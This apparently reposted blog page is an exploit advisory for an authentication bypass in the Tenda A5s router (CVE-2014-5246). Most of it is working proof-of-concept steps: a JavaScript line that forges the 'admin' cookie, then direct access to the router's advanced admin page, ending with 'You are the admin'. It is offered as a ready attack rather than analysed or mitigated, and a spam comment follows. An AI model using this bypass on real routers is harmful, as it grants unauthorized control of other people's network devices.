Tenda Router Authentication Bypass

11:12


Material's Title: Tenda A5s Router Authentication Bypass

Category: Web Applications

Platform: Hardware

Tenda A5s router suffers from an authentication bypass vulnerability due to improperly trusting cookies.


--------------------------------------------------------------------------------------------------------------------------
Tenda A5s Router Authentication Bypass Vulnerability
--------------------------------------------------------------------------------------------------------------------------

Author:


Product:


  • Vendor: Tenda
  • Version: V3.02.05_CN
  •     CVE : CVE-2014-5246

Exploit: 

Type:    Exploit & p0c

Go to you Gateway  [E.g]:
http://192.168.2.1/

Then set cookie with javascript
--------------------------------------------------------------------------------------------------------------------------
javascript:document.cookie='admin:language=zh-cn'
--------------------------------------------------------------------------------------------------------------------------
Download Cookie File From Here

Then Go to this Path[E.g]:

http://192.168.2.1/advance.asp

You are the admin...!

You Might Also Like

1 comments

  1. It is rather very good, nevertheless glance at the data with this handle. best wifi router

    ReplyDelete

Popular Posts

Like us on Facebook

Flickr Images